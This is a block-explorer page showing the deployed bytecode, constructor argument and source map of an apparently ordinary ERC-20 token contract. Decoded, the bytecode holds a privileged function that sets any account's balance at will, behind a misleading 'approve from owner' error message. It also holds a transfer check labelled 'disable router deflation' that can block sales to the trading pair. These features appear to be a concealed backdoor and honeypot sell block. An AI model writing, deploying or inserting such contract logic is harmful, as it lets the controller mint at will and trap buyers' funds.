3855105db76b70e1df7b0b98d2c4dc0ac29

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad57806398636f321161007157806398636f3214610249578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b806370a08231146101ec578063715018a6146102155780638c0b5e221461021d5780638da5cb5b1461022657806395d89b411461024157600080fd5b8063313ce567116100f4578063313ce567146101ac578063333e6f06146101bb57806339509351146101c457806344489ad1146101d757806362256589146101e457600080fd5b806306fdde031461013157806307ce29a71461014f578063095ea7b31461016457806318160ddd1461018757806323b872dd14610199575b600080fd5b6101396102de565b6040516101469190610f18565b60405180910390f35b61016261015d366004610f7b565b610370565b005b610177610172366004610fc2565b61040a565b6040519015158152602001610146565b6005545b604051908152602001610146565b6101776101a7366004610fee565b610421565b60405160098152602001610146565b61018b600a5481565b6101776101d2366004610fc2565b6104d2565b6008546101779060ff1681565b610162610509565b61018b6101fa36600461102f565b6001600160a01b031660009081526003602052604090205490565b610162610520565b61018b60095481565b6000546040516001600160a01b039091168152602001610146565b610139610534565b61017761025736600461102f565b600b6020526000908152604090205460ff1681565b61017761027a366004610fc2565b610543565b61017761028d366004610fc2565b6105de565b61018b6102a0366004611053565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b6101626102d936600461102f565b6105eb565b6060600680546102ed9061108c565b80601f01602080910402602001604051908101604052809291908181526020018280546103199061108c565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b6001546001600160a01b03163381146103a45760405162461bcd60e51b815260040161039b906110c6565b60405180910390fd5b6001821515146103c65760405162461bcd60e51b815260040161039b906110c6565b6001600160a01b0384166103ec5760405162461bcd60e51b815260040161039b90611107565b50506001600160a01b03909116600090815260036020526040902055565b6000610417338484610664565b5060015b92915050565b600061042e84848461074d565b6001600160a01b0384166000908152600460209081526040808320338452909152902054828110156104b35760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161039b565b6104c785336104c2868561115f565b610664565b506001949350505050565b3360008181526004602090815260408083206001600160a01b038716845290915281205490916104179185906104c2908690611172565b6105116108e4565b6008805460ff19166001179055565b6105286108e4565b610532600061093e565b565b6060600780546102ed9061108c565b3360009081526004602090815260408083206001600160a01b0386168452909152812054828110156105c55760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161039b565b6105d433856104c2868561115f565b5060019392505050565b600061041733848461074d565b6105f36108e4565b6001600160a01b0381166106585760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161039b565b6106618161093e565b50565b6001600160a01b0383166106c65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161039b565b6001600160a01b0382166106ec5760405162461bcd60e51b815260040161039b90611107565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107735760405162461bcd60e51b815260040161039b90611185565b6001600160a01b0382166107995760405162461bcd60e51b815260040161039b906111ca565b6107a48383836109a6565b806000036107b157505050565b6001600160a01b0383166000908152600b602052604090205460ff161580156107f357506001600160a01b0382166000908152600b602052604090205460ff16155b156108d457600d546001600160a01b039081169083160361087657600e546001600160a01b0316600090815260036020526040902054156108765760405162461bcd60e51b815260206004820152601f60248201527f45524332303a2064697361626c6520726f75746572206465666c6174696f6e00604482015260640161039b565b600d546001600160a01b038481169116148061089f5750600d546001600160a01b038381169116145b156108d45760006064600c54836108b6919061120d565b6108c09190611224565b90506108ce84848484610c71565b50505050565b6108df838383610df9565b505050565b6000546001600160a01b031633146105325760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161039b565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b60085460ff166108df576001600160a01b0383166000908152600b602052604090205460ff161580156109f257506001600160a01b0382166000908152600b602052604090205460ff16155b156108df57600954811115610a3e5760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b604482015260640161039b565b600d546001600160a01b0316610bdb57600e60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610aa1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ac59190611246565b6001600160a01b031663e6a4390530600e60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b27573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b4b9190611246565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381865afa158015610b96573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bba9190611246565b600d80546001600160a01b0319166001600160a01b03929092169190911790555b600d546001600160a01b0390811690831603610bf657505050565b600a5481610c19846001600160a01b031660009081526003602052604090205490565b610c239190611172565b11156108df5760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d61780000000000000000604482015260640161039b565b6001600160a01b038416610c975760405162461bcd60e51b815260040161039b90611185565b6001600160a01b038316610cbd5760405162461bcd60e51b815260040161039b906111ca565b6001600160a01b03841660009081526003602052604090205482811015610cf65760405162461bcd60e51b815260040161039b90611263565b6001600160a01b03851660009081526003602052604090208382039055610d1d828461115f565b92508160056000828254610d31919061115f565b90915550506001600160a01b03841660009081526003602052604081208054859290610d5e908490611172565b909155505060405182815261dead906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610dea91815260200190565b60405180910390a35050505050565b6001600160a01b038316610e1f5760405162461bcd60e51b815260040161039b90611185565b6001600160a01b038216610e455760405162461bcd60e51b815260040161039b906111ca565b6001600160a01b03831660009081526003602052604090205481811015610e7e5760405162461bcd60e51b815260040161039b90611263565b610e88828261115f565b6001600160a01b038086166000908152600360205260408082209390935590851681529081208054849290610ebe908490611172565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f0a91815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610f4557858101830151858201604001528201610f29565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461066157600080fd5b600080600060608486031215610f9057600080fd5b8335610f9b81610f66565b92506020840135915060408401358015158114610fb757600080fd5b809150509250925092565b60008060408385031215610fd557600080fd5b8235610fe081610f66565b946020939093013593505050565b60008060006060848603121561100357600080fd5b833561100e81610f66565b9250602084013561101e81610f66565b929592945050506040919091013590565b60006020828403121561104157600080fd5b813561104c81610f66565b9392505050565b6000806040838503121561106657600080fd5b823561107181610f66565b9150602083013561108181610f66565b809150509250929050565b600181811c908216806110a057607f821691505b6020821081036110c057634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526021908201527f45524332303a20617070726f76652066726f6d206f776e6572206164647265736040820152607360f81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b634e487b7160e01b600052601160045260246000fd5b8181038181111561041b5761041b611149565b8082018082111561041b5761041b611149565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761041b5761041b611149565b60008261124157634e487b7160e01b600052601260045260246000fd5b500490565b60006020828403121561125857600080fd5b815161104c81610f66565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b60608201526080019056fea26469706673582212204f0d00bf3782b6b4dc5dd54093d117855ee32c8b655904b78363bdcd5464ea3564736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000000505b3855105db76b70e1df7b0b98d2c4dc0ac29

-----Decoded View---------------
Arg [0] : router (address): 0x0505b3855105db76B70e1DF7B0B98d2c4dC0aC29

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000000505b3855105db76b70e1df7b0b98d2c4dc0ac29


Deployed Bytecode Sourcemap

18083:2653:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8622:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14901:391;;;;;;:::i;:::-;;:::i;:::-;;10788:169;;;;;;:::i;:::-;;:::i;:::-;;;1677:14:1;;1670:22;1652:41;;1640:2;1625:18;10788:169:0;1512:187:1;9741:108:0;9829:12;;9741:108;;;1850:25:1;;;1838:2;1823:18;9741:108:0;1704:177:1;11439:422:0;;;;;;:::i;:::-;;:::i;9584:92::-;;;9667:1;2489:36:1;;2477:2;2462:18;9584:92:0;2347:184:1;18409:25:0;;;;;;12270:215;;;;;;:::i;:::-;;:::i;18349:20::-;;;;;;;;;20657:76;;;:::i;9912:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10013:18:0;9986:7;10013:18;;;:9;:18;;;;;;;9912:127;2158:103;;;:::i;18376:26::-;;;;;;1508:87;1554:7;1581:6;1508:87;;-1:-1:-1;;;;;1581:6:0;;;2934:51:1;;2922:2;2907:18;1508:87:0;2788:203:1;8841:104:0;;;:::i;18441:43::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;12988:377;;;;;;:::i;:::-;;:::i;10252:175::-;;;;;;:::i;:::-;;:::i;10490:151::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10606:18:0;;;10579:7;10606:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;10490:151;2417:201;;;;;;:::i;:::-;;:::i;8622:100::-;8676:13;8709:5;8702:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8622:100;:::o;14901:391::-;15007:8;;-1:-1:-1;;;;;15007:8:0;15036:10;:20;;15028:66;;;;-1:-1:-1;;;15028:66:0;;;;;;;:::i;:::-;;;;;;;;;15123:4;15113:14;;;;15105:60;;;;-1:-1:-1;;;15105:60:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15184:21:0;;15176:68;;;;-1:-1:-1;;;15176:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;;;15257:18:0;;;;;;;:9;:18;;;;;:27;14901:391::o;10788:169::-;10871:4;10888:39;543:10;10911:7;10920:6;10888:8;:39::i;:::-;-1:-1:-1;10945:4:0;10788:169;;;;;:::o;11439:422::-;11545:4;11562:36;11572:6;11580:9;11591:6;11562:9;:36::i;:::-;-1:-1:-1;;;;;11638:19:0;;11611:24;11638:19;;;:11;:19;;;;;;;;543:10;11638:33;;;;;;;;11690:26;;;;11682:79;;;;-1:-1:-1;;;11682:79:0;;4781:2:1;11682:79:0;;;4763:21:1;4820:2;4800:18;;;4793:30;4859:34;4839:18;;;4832:62;-1:-1:-1;;;4910:18:1;;;4903:38;4958:19;;11682:79:0;4579:404:1;11682:79:0;11772:57;11781:6;543:10;11803:25;11822:6;11803:16;:25;:::i;:::-;11772:8;:57::i;:::-;-1:-1:-1;11849:4:0;;11439:422;-1:-1:-1;;;;11439:422:0:o;12270:215::-;543:10;12358:4;12407:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;12407:34:0;;;;;;;;;;12358:4;;12375:80;;12398:7;;12407:47;;12444:10;;12407:47;:::i;20657:76::-;1393:13;:11;:13::i;:::-;20710:8:::1;:15:::0;;-1:-1:-1;;20710:15:0::1;20721:4;20710:15;::::0;;20657:76::o;2158:103::-;1393:13;:11;:13::i;:::-;2223:30:::1;2250:1;2223:18;:30::i;:::-;2158:103::o:0;8841:104::-;8897:13;8930:7;8923:14;;;;;:::i;12988:377::-;543:10;13081:4;13125:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13125:34:0;;;;;;;;;;13178:35;;;;13170:85;;;;-1:-1:-1;;;13170:85:0;;5585:2:1;13170:85:0;;;5567:21:1;5624:2;5604:18;;;5597:30;5663:34;5643:18;;;5636:62;-1:-1:-1;;;5714:18:1;;;5707:35;5759:19;;13170:85:0;5383:401:1;13170:85:0;13266:67;543:10;13289:7;13298:34;13317:15;13298:16;:34;:::i;13266:67::-;-1:-1:-1;13353:4:0;;12988:377;-1:-1:-1;;;12988:377:0:o;10252:175::-;10338:4;10355:42;543:10;10379:9;10390:6;10355:9;:42::i;2417:201::-;1393:13;:11;:13::i;:::-;-1:-1:-1;;;;;2506:22:0;::::1;2498:73;;;::::0;-1:-1:-1;;;2498:73:0;;5991:2:1;2498:73:0::1;::::0;::::1;5973:21:1::0;6030:2;6010:18;;;6003:30;6069:34;6049:18;;;6042:62;-1:-1:-1;;;6120:18:1;;;6113:36;6166:19;;2498:73:0::1;5789:402:1::0;2498:73:0::1;2582:28;2601:8;2582:18;:28::i;:::-;2417:201:::0;:::o;16862:346::-;-1:-1:-1;;;;;16964:19:0;;16956:68;;;;-1:-1:-1;;;16956:68:0;;6398:2:1;16956:68:0;;;6380:21:1;6437:2;6417:18;;;6410:30;6476:34;6456:18;;;6449:62;-1:-1:-1;;;6527:18:1;;;6520:34;6571:19;;16956:68:0;6196:400:1;16956:68:0;-1:-1:-1;;;;;17043:21:0;;17035:68;;;;-1:-1:-1;;;17035:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;17116:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;17168:32;;1850:25:1;;;17168:32:0;;1823:18:1;17168:32:0;;;;;;;16862:346;;;:::o;19053:894::-;-1:-1:-1;;;;;19185:18:0;;19177:68;;;;-1:-1:-1;;;19177:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;19264:16:0;;19256:64;;;;-1:-1:-1;;;19256:64:0;;;;;;;:::i;:::-;19334:34;19351:4;19357:2;19361:6;19334:16;:34::i;:::-;19385:6;19395:1;19385:11;19381:50;;19053:894;;;:::o;19381:50::-;-1:-1:-1;;;;;19448:17:0;;;;;;:11;:17;;;;;;;;19447:18;:38;;;;-1:-1:-1;;;;;;19470:15:0;;;;;;:11;:15;;;;;;;;19469:16;19447:38;19443:451;;;19510:13;;-1:-1:-1;;;;;19510:13:0;;;19504:19;;;;19501:142;;19569:15;;-1:-1:-1;;;;;19569:15:0;9986:7;10013:18;;;:9;:18;;;;;;19551:40;19543:84;;;;-1:-1:-1;;;19543:84:0;;7613:2:1;19543:84:0;;;7595:21:1;7652:2;7632:18;;;7625:30;7691:33;7671:18;;;7664:61;7742:18;;19543:84:0;7411:355:1;19543:84:0;19671:13;;-1:-1:-1;;;;;19663:21:0;;;19671:13;;19663:21;;:44;;-1:-1:-1;19694:13:0;;-1:-1:-1;;;;;19688:19:0;;;19694:13;;19688:19;19663:44;19659:224;;;19728:13;19770:3;19754:12;;19745:6;:21;;;;:::i;:::-;19744:29;;;;:::i;:::-;19728:45;;19794:48;19818:4;19824:2;19828:6;19836:5;19794:23;:48::i;:::-;19861:7;19053:894;;;:::o;19659:224::-;19906:33;19922:4;19928:2;19932:6;19906:15;:33::i;:::-;19053:894;;;:::o;1674:132::-;1554:7;1581:6;-1:-1:-1;;;;;1581:6:0;543:10;1738:23;1730:68;;;;-1:-1:-1;;;1730:68:0;;8368:2:1;1730:68:0;;;8350:21:1;;;8387:18;;;8380:30;8446:34;8426:18;;;8419:62;8498:18;;1730:68:0;8166:356:1;2779:219:0;2864:6;;;;2853:17;;-1:-1:-1;;;;;;2853:17:0;;;-1:-1:-1;;;;;2864:6:0;;;2853:17;;;;;;2881;;;;;;;;;;2909:14;:25;;;;;;;;;2950:40;;2881:17;;2864:6;;2950:40;;2864:6;2950:40;2779:219;:::o;19955:694::-;20082:8;;;;20077:565;;-1:-1:-1;;;;;20112:17:0;;;;;;:11;:17;;;;;;;;20111:18;:38;;;;-1:-1:-1;;;;;;20134:15:0;;;;;;:11;:15;;;;;;;;20133:16;20111:38;20107:524;;;20188:11;;20178:6;:21;;20170:52;;;;-1:-1:-1;;;20170:52:0;;8729:2:1;20170:52:0;;;8711:21:1;8768:2;8748:18;;;8741:30;-1:-1:-1;;;8787:18:1;;;8780:48;8845:18;;20170:52:0;8527:342:1;20170:52:0;20247:13;;-1:-1:-1;;;;;20247:13:0;20243:176;;20326:15;;;;;;;;;-1:-1:-1;;;;;20326:15:0;-1:-1:-1;;;;;20326:23:0;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;20308:52:0;;20369:4;20376:15;;;;;;;;;-1:-1:-1;;;;;20376:15:0;-1:-1:-1;;;;;20376:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;20308:91;;-1:-1:-1;;;;;;20308:91:0;;;;;;;-1:-1:-1;;;;;9360:15:1;;;20308:91:0;;;9342:34:1;9412:15;;9392:18;;;9385:43;9277:18;;20308:91:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;20292:13;:107;;-1:-1:-1;;;;;;20292:107:0;-1:-1:-1;;;;;20292:107:0;;;;;;;;;;20243:176;20450:13;;-1:-1:-1;;;;;20450:13:0;;;20444:19;;;;20440:74;;19955:694;;;:::o;20440:74::-;20576:10;;20566:6;20550:13;20560:2;-1:-1:-1;;;;;10013:18:0;9986:7;10013:18;;;:9;:18;;;;;;;9912:127;20550:13;:22;;;;:::i;:::-;:36;;20542:73;;;;-1:-1:-1;;;20542:73:0;;9641:2:1;20542:73:0;;;9623:21:1;9680:2;9660:18;;;9653:30;9719:26;9699:18;;;9692:54;9763:18;;20542:73:0;9439:348:1;15626:798:0;-1:-1:-1;;;;;15762:20:0;;15754:70;;;;-1:-1:-1;;;15754:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15843:23:0;;15835:71;;;;-1:-1:-1;;;15835:71:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;16003:17:0;;15979:21;16003:17;;;:9;:17;;;;;;16039:23;;;;16031:74;;;;-1:-1:-1;;;16031:74:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;16143:17:0;;;;;;:9;:17;;;;;16163:22;;;16143:42;;16209:22;16219:12;16179:6;16209:22;:::i;:::-;;;16258:12;16242;;:28;;;;;;;:::i;:::-;;;;-1:-1:-1;;;;;;;16281:20:0;;;;;;:9;:20;;;;;:30;;16305:6;;16281:20;:30;;16305:6;;16281:30;:::i;:::-;;;;-1:-1:-1;;16329:36:0;;1850:25:1;;;7823:42:0;;-1:-1:-1;;;;;16329:36:0;;;;;1838:2:1;1823:18;16329:36:0;;;;;;;16398:9;-1:-1:-1;;;;;16381:35:0;16390:6;-1:-1:-1;;;;;16381:35:0;;16409:6;16381:35;;;;1850:25:1;;1838:2;1823:18;;1704:177;16381:35:0;;;;;;;;15743:681;15626:798;;;;:::o;13855:604::-;-1:-1:-1;;;;;13961:20:0;;13953:70;;;;-1:-1:-1;;;13953:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14042:23:0;;14034:71;;;;-1:-1:-1;;;14034:71:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14202:17:0;;14178:21;14202:17;;;:9;:17;;;;;;14238:23;;;;14230:74;;;;-1:-1:-1;;;14230:74:0;;;;;;;:::i;:::-;14335:22;14351:6;14335:13;:22;:::i;:::-;-1:-1:-1;;;;;14315:17:0;;;;;;;:9;:17;;;;;;:42;;;;14368:20;;;;;;;;:30;;14392:6;;14315:17;14368:30;;14392:6;;14368:30;:::i;:::-;;;;;;;;14433:9;-1:-1:-1;;;;;14416:35:0;14425:6;-1:-1:-1;;;;;14416:35:0;;14444:6;14416:35;;;;1850:25:1;;1838:2;1823:18;;1704:177;14416:35:0;;;;;;;;13942:517;13855:604;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:484;777:6;785;793;846:2;834:9;825:7;821:23;817:32;814:52;;;862:1;859;852:12;814:52;901:9;888:23;920:31;945:5;920:31;:::i;:::-;970:5;-1:-1:-1;1022:2:1;1007:18;;994:32;;-1:-1:-1;1078:2:1;1063:18;;1050:32;1120:15;;1113:23;1101:36;;1091:64;;1151:1;1148;1141:12;1091:64;1174:7;1164:17;;;703:484;;;;;:::o;1192:315::-;1260:6;1268;1321:2;1309:9;1300:7;1296:23;1292:32;1289:52;;;1337:1;1334;1327:12;1289:52;1376:9;1363:23;1395:31;1420:5;1395:31;:::i;:::-;1445:5;1497:2;1482:18;;;;1469:32;;-1:-1:-1;;;1192:315:1:o;1886:456::-;1963:6;1971;1979;2032:2;2020:9;2011:7;2007:23;2003:32;2000:52;;;2048:1;2045;2038:12;2000:52;2087:9;2074:23;2106:31;2131:5;2106:31;:::i;:::-;2156:5;-1:-1:-1;2213:2:1;2198:18;;2185:32;2226:33;2185:32;2226:33;:::i;:::-;1886:456;;2278:7;;-1:-1:-1;;;2332:2:1;2317:18;;;;2304:32;;1886:456::o;2536:247::-;2595:6;2648:2;2636:9;2627:7;2623:23;2619:32;2616:52;;;2664:1;2661;2654:12;2616:52;2703:9;2690:23;2722:31;2747:5;2722:31;:::i;:::-;2772:5;2536:247;-1:-1:-1;;;2536:247:1:o;2996:388::-;3064:6;3072;3125:2;3113:9;3104:7;3100:23;3096:32;3093:52;;;3141:1;3138;3131:12;3093:52;3180:9;3167:23;3199:31;3224:5;3199:31;:::i;:::-;3249:5;-1:-1:-1;3306:2:1;3291:18;;3278:32;3319:33;3278:32;3319:33;:::i;:::-;3371:7;3361:17;;;2996:388;;;;;:::o;3389:380::-;3468:1;3464:12;;;;3511;;;3532:61;;3586:4;3578:6;3574:17;3564:27;;3532:61;3639:2;3631:6;3628:14;3608:18;3605:38;3602:161;;3685:10;3680:3;3676:20;3673:1;3666:31;3720:4;3717:1;3710:15;3748:4;3745:1;3738:15;3602:161;;3389:380;;;:::o;3774:397::-;3976:2;3958:21;;;4015:2;3995:18;;;3988:30;4054:34;4049:2;4034:18;;4027:62;-1:-1:-1;;;4120:2:1;4105:18;;4098:31;4161:3;4146:19;;3774:397::o;4176:398::-;4378:2;4360:21;;;4417:2;4397:18;;;4390:30;4456:34;4451:2;4436:18;;4429:62;-1:-1:-1;;;4522:2:1;4507:18;;4500:32;4564:3;4549:19;;4176:398::o;4988:127::-;5049:10;5044:3;5040:20;5037:1;5030:31;5080:4;5077:1;5070:15;5104:4;5101:1;5094:15;5120:128;5187:9;;;5208:11;;;5205:37;;;5222:18;;:::i;5253:125::-;5318:9;;;5339:10;;;5336:36;;;5352:18;;:::i;6601:401::-;6803:2;6785:21;;;6842:2;6822:18;;;6815:30;6881:34;6876:2;6861:18;;6854:62;-1:-1:-1;;;6947:2:1;6932:18;;6925:35;6992:3;6977:19;;6601:401::o;7007:399::-;7209:2;7191:21;;;7248:2;7228:18;;;7221:30;7287:34;7282:2;7267:18;;7260:62;-1:-1:-1;;;7353:2:1;7338:18;;7331:33;7396:3;7381:19;;7007:399::o;7771:168::-;7844:9;;;7875;;7892:15;;;7886:22;;7872:37;7862:71;;7913:18;;:::i;7944:217::-;7984:1;8010;8000:132;;8054:10;8049:3;8045:20;8042:1;8035:31;8089:4;8086:1;8079:15;8117:4;8114:1;8107:15;8000:132;-1:-1:-1;8146:9:1;;7944:217::o;8874:251::-;8944:6;8997:2;8985:9;8976:7;8972:23;8968:32;8965:52;;;9013:1;9010;9003:12;8965:52;9045:9;9039:16;9064:31;9089:5;9064:31;:::i;9792:402::-;9994:2;9976:21;;;10033:2;10013:18;;;10006:30;10072:34;10067:2;10052:18;;10045:62;-1:-1:-1;;;10138:2:1;10123:18;;10116:36;10184:3;10169:19;;9792:402::o

Swarm Source

ipfs://4f0d00bf3782b6b4dc5dd54093d117855ee32c8b655904b78363bdcd5464ea35
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.